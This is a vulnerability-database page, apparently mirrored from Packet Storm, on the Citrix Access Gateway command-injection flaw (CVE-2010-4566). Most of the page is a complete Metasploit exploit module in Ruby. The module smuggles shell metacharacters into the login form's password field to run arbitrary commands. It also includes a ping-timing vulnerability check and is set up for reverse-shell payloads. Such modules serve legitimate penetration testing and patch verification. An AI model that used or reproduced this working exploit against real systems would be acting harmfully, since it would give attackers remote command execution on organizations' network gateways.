Citrix Access Gateway Command Execution

🗓️ 04 Mar 2011 00:00:00Reported by George D. GalType

packetstorm🔗 packetstormsecurity.com👁 39 Views

Citrix Access Gateway Command Execution. The Citrix Access Gateway allows arbitrary command execution through the legacy NTLM authentication module.

Reporter	Title	Published	Views	Family All 13
Circl	CVE-2010-4566	22 Dec 201000:00	–	circl
CVE	CVE-2010-4566	14 Jan 201122:00	–	cve
Cvelist	CVE-2010-4566	14 Jan 201122:00	–	cvelist
Exploit DB	Citrix Access Gateway - Command Injection	22 Dec 201000:00	–	exploitdb
Exploit DB	Citrix Access Gateway - Command Execution (Metasploit)	3 Mar 201100:00	–	exploitdb
exploitpack	Citrix Access Gateway - Command Injection	22 Dec 201000:00	–	exploitpack
Metasploit	Citrix Access Gateway Command Execution	3 Mar 201120:51	–	metasploit
NVD	CVE-2010-4566	14 Jan 201123:00	–	nvd
Packet Storm	Citrix Access Gateway Command Injection	21 Dec 201000:00	–	packetstorm
Prion	Authentication flaw	14 Jan 201123:00	–	prion

`##  
# $Id: citrix_access_gateway_exec.rb 11873 2011-03-03 20:51:12Z jduck $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Citrix Access Gateway Command Execution',  
'Description' => %q{  
The Citrix Access Gateway provides support for multiple authentication types.  
When utilizing the external legacy NTLM authentication module known as  
ntlm_authenticator the Access Gateway spawns the Samba 'samedit' command  
line utility to verify a user's identity and password. By embedding shell  
metacharacters in the web authentication form it is possible to execute  
arbitrary commands on the Access Gateway.  
},  
'Author' =>  
[  
'George D. Gal', # Original advisory  
'Erwin Paternotte', # Exploit module  
],  
'License' => MSF_LICENSE,  
'Version' => '$Revision: 11873 $',  
'References' =>  
[  
[ 'CVE', '2010-4566' ],  
[ 'OSVDB', '70099' ],  
[ 'BID', '45402' ],  
[ 'URL', 'http://www.vsecurity.com/resources/advisory/20101221-1/' ]  
],  
'Privileged' => false,  
'Payload' =>  
{  
'Space' => 127,  
'DisableNops' => true,  
'Compat' =>  
{  
'PayloadType' => 'cmd cmd_bash',  
'RequiredCmd' => 'generic telnet bash-tcp'  
}  
},  
'DefaultOptions' =>  
{  
'WfsDelay' => 30  
},  
'Platform' => [ 'unix' ],  
'Arch' => ARCH_CMD,  
'Targets' => [[ 'Automatic', { }]],  
'DisclosureDate' => 'Dec 21 2010',  
'DefaultTarget' => 0))  
  
register_options(  
[  
Opt::RPORT(443),  
OptBool.new('SSL', [ true, 'Use SSL', true ]),  
], self.class)  
  
end  
  
def post(command, background)  
username = rand_text_alphanumeric(20)  
  
if background  
sploit = Rex::Text.uri_encode('|' + command + '&')  
else  
sploit = Rex::Text.uri_encode('|' + command)  
end  
  
data = "SESSION_TOKEN=1208473755272-1381414381&LoginType=Explicit&username="  
data << username  
data << "&password="  
data << sploit  
  
res = send_request_cgi({  
'uri' => '/',  
'method' => 'POST',  
'data' => data  
}, 25)  
end  
  
def check  
print_status("Attempting to detect if the Citrix Access Gateway is vulnerable...")  
  
# Try running/timing 'ping localhost' to determine is system is vulnerable  
start = Time.now  
post("ping -c 10 127.0.0.1", false)  
elapsed = Time.now - start  
if elapsed >= 3  
return Exploit::CheckCode::Vulnerable  
end  
  
return Exploit::CheckCode::Safe  
end  
  
def exploit  
cmd = payload.encoded  
  
if not post(cmd, true)  
raise RuntimeError, "Unable to execute the desired command"  
end  
end  
end  
`

04 Mar 2011 00:00Current

0.6Low risk

Vulners AI Score0.6

EPSS0.71849